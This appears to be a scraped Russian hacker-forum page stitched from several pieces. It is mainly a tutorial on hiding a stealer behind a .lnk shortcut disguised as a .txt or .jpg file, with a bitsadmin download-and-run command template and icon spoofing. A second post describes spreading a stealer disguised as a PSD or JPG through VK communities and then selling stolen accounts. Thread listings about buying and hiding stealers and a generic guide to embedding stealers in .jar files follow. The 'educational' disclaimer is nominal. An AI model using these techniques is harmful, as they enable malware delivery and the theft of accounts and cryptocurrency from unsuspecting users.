Стиллер в файле любого расширения

LOLZTEAM

Прячем стиллер в тхт и так далее!

Статья носит образовательный характер, мы ни к чему не призываем и не обязываем. Информация представлена исключительно в ознакомительных целях.

Больше интересных статей на нашем форуме: https://zelenka.guru/articles/

Подписывайтесь на канал и делитесь ссылкой на статью с друзьями!

Как выглядит зараженный файл?

Как вы уже поняли, “Exploit.txt” заражён. Он выглядит как обычный текстовый документ, на компьютере жертвы не будет отличий. В этом файле спрятана полезная нагрузка, которая открывает файл по указанному пути. Вся его суть завязана на расширении “.lnk”, которое Windows не отображает. Такой файл антивирус не удалит при скантайме, мы научимся создавать команду, которая активирует нашу полезную нагрузку с любого места на устройстве.

Как на это попался подписчик?

По его словам, он занимается криптоотработкой. В логе компьютера он обнаружил холодный кошелёк, баланс которого превышал 13k$. При попытке открыть скриншот экрана с расширением “.jpg”, он попросту не открылся. Полная маскировка, файл не подавал признаков ненастоящего. Спустя несколько минут его криптокошелёк был похищен, ушла огромная сумма денег на адрес злоумышленника. Огромные потери и недопонимание, как он, будучи опытным пользователем смог скачать вирус? Пример такого файла изучите ниже.

Принцип работы:

Как я и упомянул выше, ярлыки не показывают свой тип. Мы бы не смогли использовать “.exe”, так как он отображает свое окончание при включенном пункте в “Параметрах папок”. Основной принцип работы: запуск файла из указанной директории. Да, можно внедрить загрузку файла прямо с сервера, но вариант сам по себе не очень. Причина: полный детект антивирусов. Даже при чистом стабе загрузка не начнётся, антивирус моментально удалит ярлык. 

В образовательном формате оставляю пример, изучите после следующего пункта. 

C:\Windows\System32\cmd.exe /k C:\Windows\System32\bitsadmin.exe /transfer {любое имя} {прямая ссылка на файл} C:\{директория для сохранения} /k {прямой путь к скачанному файлу} - Принцип работы загрузки & запуска.

Создание эксплоита

Для начала нам нужно определить папку в которой все будет происходить. 

Я же буду делать аналогию того, на что наткнулся подписчик. По пути:

/FileGrabber/Users/Admin/Desktop/Trash/Work

я поместил файл с названием “HACK2DAY.exe”, который и будет выполняться после открытия ярлыка. Вы также можете поместить его вглубь, туда, куда никто и заходить не станет. После этого создаем ярлык на этот файл.

Переносим его в основную “лицевую” папку и называем как душе угодно, указав расширение. У меня это будет “Screenshot.jpg”. Но вот незадача, как он будет работать на другом устройстве? Ведь путь простроен по локальным данным в которых курирует имя компьютера, диск на котором хранится папка и прочие загвоздки. Все просто, мы будем обращаться к командной строке для установления текущего пути, что и сделает наш ярлык “портативным” под любое устройство. Для этого открываем свойства ярлыка и в строку “Start in” вписываем “%currentdir%”. Чтобы открыть наш “.exe” также без командной строки не обойтись. В “Target” вводим следующий код, изменяя его под свой файл:

%windir%\system32\cmd.exe /c FileGrabber\\Users\\Admin..\\HACK2DAY.exe

УЧТИТЕ, НУЖНО ИСПОЛЬЗОВАТЬ “\\” ПО ДРУГОМУ НЕ БУДЕТ РАБОТАТЬ!

По итогу мы должны достигнуть такой картины как на скриншоте:

В этом меню можно и замаскировать иконку вашего ярлыка на ту, которую имеет настоящий файл. Для этого нажимаем “Change Icon” и ищем подходящую. Если у вас не будет выбора, в окне введите несуществующий путь к файлу и оно выдаст ошибку, тем самым предложит выбрать из системных. Так как у меня маскировка под “.jpg” я выбрал соответствующую. По итогу я получил файл, который является копией обычного изображения. Отличить такое можно только по маленькой “стрелочке”, которая создается в левом нижнем углу иконки.

На этом всё. Удачи!

Наш форум: https://zelenka.guru

Наши проекты в Telegram: https://t.me/guarantor_lzt_bot

Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.

Данный способ

придумал сам

, для тех кто любит держать свои магазины по продаже аккаунтов и т.д.
Работать придется со стиллером (говорю сразу: стиллер Вам придется искать самим).
Что же нам нужно для easy распространения своего стиллера?
– Желание заработать, прямые руки.
* а ещё нам придется немного поработать в PH, самую малость *

Заходим в сообщество по типу: “Ресурспаки | Все для фотошопа / Готовые шапки для YouTube”,
потом дабы нас не спалили с работой – нажимаем на стенке сообщества “Записи сообщества”

После у нас появляется возможность отмотать стенку немного обратно, и посмотреть посты которые были запощены ещё в начале лета, или что-то
типа такого (это нам нужно дабы можно было эту запись запостить ещё раз, память ведь у модераторов не вечная)

Находим какую-то красивую картиночку с каким-то ресурспаком, или же просто с паком для PH
(в моем случае я нашёл с паком для PH):

Скачиваем наш пак для PH (про который уже наверняка все забыли):

После того как мы скачали наш пак, мы можем изменить название на картинке к примеру:
не HardWorkerV5, а HardWorkerEXE (прошу обратить внимание на последнюю надпись EXE) т.к. мы будем шифровать EXE файл под PSD или же JPG,
но школьники то будут думать что это название такое, а не шифровальщик, и в этом наша фишка.

В моем случае в PSD архиве ПАКА изменить текст не удалось, но я сделал свою (сильно не парился, поэтому не судите строго), как пример:

После мы шифруем стиллер .exe в .psd или .jpg формат (в .psd если зашифруете будет вообще бомбезный профит).
Как зашифровать Вам расскажет overbafer1 (у него получается рассказать лучше) –
Пример того что должно выйти у Вас:

После помещаем данный файл в RAR-архив, ну и в придачу можно ещё сделать шифровальщик на .jpg формат (некоторые открывают и картинки
которые находятся в архивах), но это уже по желанию конечно же.

Но Ребята, не советую прям всем использовать exe в конце каждой надписи того что Вы будете постить, быстро спалят и Вам просто выдадут бан
в сообществе. + все аналогичные сообщества зачастую в наглую берут и копируют материал (т.е. если Вы запостили этот архив в одну группу, то
не удивляйтесь если увидите его на следующий день в другой группе, это так же будет помогать Вам в продвижении Вашего стиллера).

Ну и на последок просто заливаем этот архив на rgho.st (можно попробовать сразу архив кинуть через документы ВК), идем в сообщество и заливаем материал:

Модераторы ленивые там, поэтому практически не проверяют материал (к тому же они 100% не подозревают что там могут быть стиллеры, т.к. до этого
такого ещё никто не делал). Ну и через некоторое время (пол дня максимум ждал) Ваш пост публикуют, и сразу же набегает на него
нереальная куча школьников (и не только, есть ютуберщики, кстати они частенько там тусуются).

И таких сообществ просто куча тьмущая, Вы можете таким способом easy продвигать Ваш стиллер.
Ну, а после пойманной добычи заливайте в свой магазин на продажу аккаунты/страницы и т.д. (ну или найдите этому применения сами).

  1. V

    Создание стиллера.

    Никогда не делал стиллер, хочу попробовать. Подскажите, как просто его написать самому или гайд/тему по которой можно его сделать.

    • Vasiliy_Alberte
    • Тема

    • #стиллер


      стиллер
    • Ответы: 4
    • Раздел: Вопрос – Ответ
  2. P

    Ситуация после взлома

    Добрый день! Я хотел проконсультироваться по своей безопасности.
    Недавно на компьютере был обнаружен вирус, после этого через 2-3 дня был взлом некоторых аккаунтов привязанных к гуглу.
    В общем большая вероятность того, что это был стиллер.
    Я, переустановив виндоус на новый ссд накопитель с него…

    • PrastoCot
    • Тема

    • безопасность


      вирус


      стиллер
    • Ответы: 9
    • Раздел: Вопрос – Ответ
  3. B

    Можно ли создать ссылку-стилер

    Можно ли сгенерировать ссылку или сделать свой сайт при переходе на который ты получал сохранённые пароли браузеров и куки файлы либо же стилер паролей на Андроиде просто при переходе на ссылку и больше нечего

    • bogdan333
    • Тема

    • скам


      ссылка стиллер


      стиллер
    • Ответы: 14
    • Раздел: Вопрос – Ответ
  4. DodNadzor

    Как склеить стиллер ( формат .exe ) В другую программу такого же формата?

    Я просто тупой. Нужно склеить ехе+ехе. Возможно ли, если да то как?

    • DodNadzor
    • Тема

    • стиллер
    • Ответы: 3
    • Раздел: Вопрос – Ответ
  5. U

    Стиллер USB

    Привет, понимаю что тема уже пройдена, но дело в том что я чайник, и не могу понять что да как сделать,поэтому обращаюсь к вам с просьбой расписать мне это пообъемней.
    Нужен стиллер, есть возможность задеть флешку в комп жертвы, но ,вероятно, она будет стоять над душой и видеть все что я делаю…

    • UDLUTEI
    • Тема

    • стиллер
    • Ответы: 0
    • Раздел: Вопрос – Ответ
  6. sharik_smesharik

    Подскажите нормальный стиллер

    знаю про существование arkei и rarog , но к сожалению не могу найти их создателей, может знает кто какую нибудь нормальную замену ?

    • sharik_smesharik
    • Тема

    • пароли


      стиллер
    • Ответы: 3
    • Раздел: Вопрос – Ответ


  7. N

    Покупка stealer or RAT

    Всем доброго времени суток.
    Интересует покупка stealer (azorult не предлагать) ценовым диапазоном до 100$ или RAT до 300$
    Необходимый функционал для стила
    1)Максимальный отстук с Google Chrome
    2)Сессии телеги
    3)Удобная морда(не обяз но желательно)
    4)Отстук инфо (ip и…

    • neybivatebilla
    • Тема

    • ратник


      стиллер
    • Ответы: 0
    • Раздел: Поиск Фрилансеров и Заказчиков
  8. EartyStudio

    Проблема Кто знает хороший stealer (стиллер)?

    Создаю большой мануал по взлому ВК для перехода в Grey.
    В одном из способов нужен стиллер (stealer) паролей браузеров.
    В паблике хороших не находил. Писать самому времени нет.
    Кто-то знает хороший стиллер (stealer) в паблике?

    • EartyStudio
    • Тема

    • стиллер
    • Ответы: 8
    • Раздел: Свободное общение


  9. A

    Конкурс [Угнать за 50с.] Форк “система сбора секретных данных от am29f010b”

    “Статья для участия в конкурсе Конкурс 2018 года – авторская статья по любой тематике нашего форума! ”
    Всем привет! Мои поздравления с ННГ!
    Публикую новогодний Tutorial – релевантный hack_man в жанре киберпанк по созданию прокачанного стиллера «гибридной системы сбора данных»…

    • am29f010b
    • Тема

    • стиллер
    • Ответы: 24
    • Раздел: Этичный хакинг и тестирование на проникновение


  10. S

    Как вытащить НЕСОХРАНЕННЫЙ пароль из Firefox своего компа?

    Очень печально просрал пароль и логин от вк, восстановить нет никакой возможности через тех поддержку и тд. всё было левое, браузер Firefox, windows 10 x64, пароль никогда не сохранялся в браузер. С помощью чего можно вытащить пароль? когда-то пользовался UFR. Вспомнил о нём, но сейчас он не…

    • shammahh21
    • Тема

    • windows 10


      достать пароль


      стиллер
    • Ответы: 3
    • Раздел: Вопрос – Ответ


  11. C

    Проблема Как скрыть стиллер от антивирусников?

    Всем привет!
    К большому сожалению, только начинаю изучать этичный взлом, краж куков и так далее…
    В данный момент у меня приобритён стиллер. Вещь конечно полезная… Но сейчас он очень сильно палится. Подскажите, пожалуйста, как можно изменить его сигнатуру имея только .exe установку стиллера…

    • Calmness
    • Тема

    • вирусология


      стиллер
    • Ответы: 11
    • Раздел: Этичный хакинг и тестирование на проникновение
  12. CyberX88

    Проблема Реверс стиллера

    Доброго времени суток, появилась интересная задача, с которой мне не по силам справиться без вас.
    Здача такова, на комп попал стиллер, в следствии чего были утрачены всевозможные аккаунты. Хотелось бы узнать, как его найти и посмотреть куда он отправляет логи, возможно другую полезную информацию.

    • CyberX88
    • Тема

    • реверс


      стиллер
    • Ответы: 5
    • Раздел: Свободное общение
  13. cat_meow_666

    Проблема Стиллер. Как склеить все эти программы в один файл ?

    Есть не сколько стиллеров. Они же запускаются через бат(или через exe). А батник запускает VBS в скрытом режиме и + отправляет на почту данные txt.
    Как склеить все эти программы в один файл. Чтоб не было так палевно.(

  14. KrasPvP

    Стиллер веб-страницы (сообщений)

    Доброго времени суток, форумчане.
    Надеюсь, тему не удалят за ее формат, всё же как ни как, но к безопасности относится.
    Заинтересовался вот чем: есть цель получить сообщения из Вк девушки, узнать, переписывается ли она с парнем. Цель не в “украсть пароль\логин” или следить за ее переписками, а…

    • KrasPvP
    • Тема

    • shall


      stealer


      stealing


      вконтакте


      сообщения


      стиллер


      шелл


      шэлл
    • Ответы: 4
    • Раздел: Вопрос – Ответ
  15. cat_meow_666

    Статья Стиллер через Bat файл на всё

    Опять же всем привет.
    В тот раз я показывал как через powersshell украсть пароль от wifi. Но пользователь подником Remir (Спасибо тебе) показал иной путь к этой…
    И я решил легкий(супер легкий бат файл) с 8 программами чтоб украсть у жертвы все самое главное.(Конечно есть ещё ряд других…



  16. K

    Флэшка стиллер

    Привет уважаемые форумчане.
    Нужен стиллер которого поставлю на флэшку и при подключении флэшки к ПК, все пароли сохранились на флэшку. Не нахожу стиллера который сохраняет данные на ту-же флэшку, большинство отправляют данные по фтп, эмейл и т.д.
    На данный момент есть батник который такое…

    • Koyerete
    • Тема

    • linux


      mac


      steal windows credential


      stealer


      stealing


      windows


      стиллер
    • Ответы: 1
    • Раздел: Вопрос – Ответ

Меняем на стиллере расширение exe на текстовое расширение doc

35 – Как маскируют расширение файла .exe на любое другое (pdf, png и т.д.)Подробнее

35 - Как маскируют расширение файла .exe на любое другое (pdf, png и т.д.)

Как изменить расширение файлов в виндовс Windows 10Подробнее

Как изменить расширение файлов в виндовс Windows 10

Как изменить расширение файла? Меняем тип файла без программПодробнее

Как изменить расширение файла? Меняем тип файла без программ

КАК СКЛЕИТЬ ФАЙЛЫ | 3 СПОСОБА СКЛЕЙКИПодробнее

КАК СКЛЕИТЬ ФАЙЛЫ | 3 СПОСОБА СКЛЕЙКИ

Как отправить исполняемый файл с ,,exe,, расширением по почтеПодробнее

Как отправить исполняемый файл с ,,exe,, расширением по почте

HackerSchool. Урок №1 | Делаем exe СтиллерПодробнее

HackerSchool. Урок №1 | Делаем exe Стиллер

“Склейка” exe и docx. Эксплуатируем уязвимость DDE (CVE-2017-11826).Подробнее

'Склейка' exe и docx. Эксплуатируем уязвимость DDE (CVE-2017-11826).

Расширение файлов. Как отобразить и изменить в Windows 10, 8 или 7Подробнее

Расширение файлов. Как отобразить и изменить в Windows 10, 8 или 7

Прячем вирус в Word. Как заражают документы Microsoft Office?Подробнее

Прячем вирус в Word. Как заражают документы Microsoft Office?

Изменились ярлыки и не открываются программы. Восстановление ассоциаций файлов .exeПодробнее

Изменились ярлыки и не открываются программы. Восстановление ассоциаций файлов .exe

КАК СКЛЕИТЬ ФАЙЛЫ (гайд) | СКЛЕЙКА EXEПодробнее

КАК СКЛЕИТЬ ФАЙЛЫ (гайд) | СКЛЕЙКА EXE

FUD КРИПТ + СКЛЕЙКА ПОД DOC PDF MP3 PNG, JPG TXT – 0 детектаПодробнее

FUD КРИПТ + СКЛЕЙКА ПОД DOC PDF MP3 PNG, JPG TXT - 0 детекта

Как изменить тип файла в Windows 11.Расширение файлаПодробнее

Как изменить тип файла в Windows 11.Расширение файла

Актуальное

Вшивание стиллеров или логгеров в .jar файлы – это один из методов кибератак, который используется для хищения информации или отслеживания действий пользователя на компьютере. В данной статье будет рассмотрен процесс создания такого файла и его использование.

Шаг 1: Создание .jar файла

Первым шагом является создание .jar файла. .jar – это архив, который содержит в себе исполняемый код, библиотеки и другие ресурсы, необходимые для работы программы.

Шаг 2: Создание стиллера/логгера

Далее необходимо создать сам стиллер/логгер. Для этого можно использовать любой язык программирования, который поддерживает создание .jar файлов.

Шаг 3: Вшивание стиллера в .jar файл

Чтобы вшить стиллер/логгер в .jar файл, необходимо создать новый класс внутри .jar файла. В этом классе нужно создать метод, который будет вызываться при запуске программы. В этом методе необходимо вставить код, который будет запускать стиллер/логгер.

Шаг 4: Скрытие стиллера/логгера

Для того чтобы стиллер/логгер не был замечен антивирусной программой, необходимо скрыть его от ее сканирования. Для этого можно изменить код стиллера/логгера таким образом, чтобы он мог изменять себя самостоятельно. Также можно использовать методы обхода защиты, такие как “запаковка” кода стиллера/логгера.

Шаг 5: Использование

После того как стиллер/логгер был успешно вшит в .jar файл и скрыт от антивирусной программы, его можно использовать для сбора информации или отслеживания действий пользователя на компьютере.

Заключение

Вшивание стиллера/логгера в .jar файл – это один из методов кибератак. Создание такого файла достаточно сложно и требует знаний программирования. Однако, использование стиллера/логгера может привести к серьезным последствиям для жертвы. Поэтому необходимо быть осторожным при работе с неизвестных и подозрительных файлов.

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *